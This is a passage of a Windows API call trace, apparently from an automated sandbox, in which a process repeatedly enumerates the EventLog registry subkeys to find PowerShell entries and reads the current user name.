lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.201] CoTaskMemFree (pv=0x1a3a10) [0079.201] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x7, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.201] CoTaskMemFree (pv=0x1a3a10) [0079.201] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x8, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.202] CoTaskMemFree (pv=0x1a3a10) [0079.202] CoTaskMemFree (pv=0x0) [0079.202] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x308) returned 0x0 [0079.202] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.202] RegOpenKeyExW (in: hKey=0x334, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x338) returned 0x0 [0079.202] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.202] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x33c) returned 0x0 [0079.202] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.202] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x340) returned 0x0 [0079.203] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.203] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x344) returned 0x0 [0079.203] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.203] RegOpenKeyExW (in: hKey=0x334, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x348) returned 0x0 [0079.203] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.203] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x34c) returned 0x0 [0079.203] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.204] RegOpenKeyExW (in: hKey=0x334, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x350) returned 0x0 [0079.204] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2 [0079.204] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x354) returned 0x0 [0079.204] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x358) returned 0x0 [0079.204] RegCloseKey (hKey=0x358) returned 0x0 [0079.204] RegCloseKey (hKey=0x334) returned 0x0 [0079.205] RegCloseKey (hKey=0x354) returned 0x0 [0079.326] CoTaskMemAlloc (cb=0x804) returned 0x121320 [0079.326] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x121320, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.327] CoTaskMemFree (pv=0x121320) [0079.329] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.329] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.329] CoTaskMemFree (pv=0x1a3a10) [0079.409] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccec8 | out: phkResult=0xccec8*=0x35c) returned 0x0 [0079.409] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x0) [0079.410] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.410] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x1a3a10) [0079.410] CoTaskMemFree (pv=0x0) [0079.410] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.410] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x1a3a10) [0079.410] CoTaskMemFree (pv=0x0) [0079.410] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.410] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x1a3a10) [0079.410] CoTaskMemFree (pv=0x0) [0079.410] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.410] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x1a3a10) [0079.410] CoTaskMemFree (pv=0x0) [0079.410] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.410] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.410] CoTaskMemFree (pv=0x1a3a10) [0079.410] CoTaskMemFree (pv=0x0) [0079.411] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.411] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.411] CoTaskMemFree (pv=0x1a3a10) [0079.411] CoTaskMemFree (pv=0x0) [0079.411] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.411] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.411] CoTaskMemFree (pv=0x1a3a10) [0079.411] CoTaskMemFree (pv=0x0) [0079.411] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.411] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.411] CoTaskMemFree (pv=0x1a3a10) [0079.411] CoTaskMemFree (pv=0x0) [0079.411] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.411] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.411] CoTaskMemFree (pv=0x1a3a10) [0079.411] CoTaskMemFree (pv=0x0) [0079.411] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x360) returned 0x0 [0079.412] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.412] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x364) returned 0x0 [0079.412] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.412] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x368) returned 0x0 [0079.412] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.412] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x36c) returned 0x0 [0079.412] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.412] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x370) returned 0x0 [0079.413] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.413] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x374) returned 0x0 [0079.413] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.413] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x378) returned 0x0 [0079.413] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.413] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x37c) returned 0x0 [0079.413] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.413] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x380) returned 0x0 [0079.414] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x384) returned 0x0 [0079.414] RegCloseKey (hKey=0x384) returned 0x0 [0079.414] RegCloseKey (hKey=0x35c) returned 0x0 [0079.415] RegCloseKey (hKey=0x380) returned 0x0 [0079.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccec8 | out: phkResult=0xccec8*=0x380) returned 0x0 [0079.416] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.416] CoTaskMemFree (pv=0x0) [0079.416] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.416] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.416] CoTaskMemFree (pv=0x1a3a10) [0079.416] CoTaskMemFree (pv=0x0) [0079.416] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.416] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.416] CoTaskMemFree (pv=0x1a3a10) [0079.416] CoTaskMemFree (pv=0x0) [0079.416] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.416] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.416] CoTaskMemFree (pv=0x1a3a10) [0079.416] CoTaskMemFree (pv=0x0) [0079.417] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.417] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.417] CoTaskMemFree (pv=0x1a3a10) [0079.417] CoTaskMemFree (pv=0x0) [0079.417] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.417] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.417] CoTaskMemFree (pv=0x1a3a10) [0079.417] CoTaskMemFree (pv=0x0) [0079.417] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.417] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.417] CoTaskMemFree (pv=0x1a3a10) [0079.417] CoTaskMemFree (pv=0x0) [0079.417] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.417] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.418] CoTaskMemFree (pv=0x1a3a10) [0079.418] CoTaskMemFree (pv=0x0) [0079.418] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.418] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.418] CoTaskMemFree (pv=0x1a3a10) [0079.418] CoTaskMemFree (pv=0x0) [0079.418] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.418] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x1a3a10, lpcchName=0xccec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.418] CoTaskMemFree (pv=0x1a3a10) [0079.418] CoTaskMemFree (pv=0x0) [0079.418] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x35c) returned 0x0 [0079.418] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.418] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x384) returned 0x0 [0079.418] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.419] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x388) returned 0x0 [0079.419] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.419] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x38c) returned 0x0 [0079.419] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.419] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x390) returned 0x0 [0079.419] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.419] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x394) returned 0x0 [0079.420] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.420] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x398) returned 0x0 [0079.420] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.420] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x39c) returned 0x0 [0079.420] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x0) returned 0x2 [0079.420] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x3a0) returned 0x0 [0079.421] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf28 | out: phkResult=0xccf28*=0x3a4) returned 0x0 [0079.421] RegCloseKey (hKey=0x3a4) returned 0x0 [0079.421] RegCloseKey (hKey=0x380) returned 0x0 [0079.421] RegCloseKey (hKey=0x3a0) returned 0x0 [0079.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce98 | out: phkResult=0xcce98*=0x3a0) returned 0x0 [0079.423] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.423] CoTaskMemFree (pv=0x0) [0079.423] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.423] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.423] CoTaskMemFree (pv=0x1a3a10) [0079.423] CoTaskMemFree (pv=0x0) [0079.423] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.423] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.423] CoTaskMemFree (pv=0x1a3a10) [0079.423] CoTaskMemFree (pv=0x0) [0079.423] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.423] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.423] CoTaskMemFree (pv=0x1a3a10) [0079.423] CoTaskMemFree (pv=0x0) [0079.423] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree (pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.424] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree (pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.424] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree (pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.424] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree (pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.424] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree (pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.424] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.424] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x1a3a10, lpcchName=0xcce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.424] CoTaskMemFree 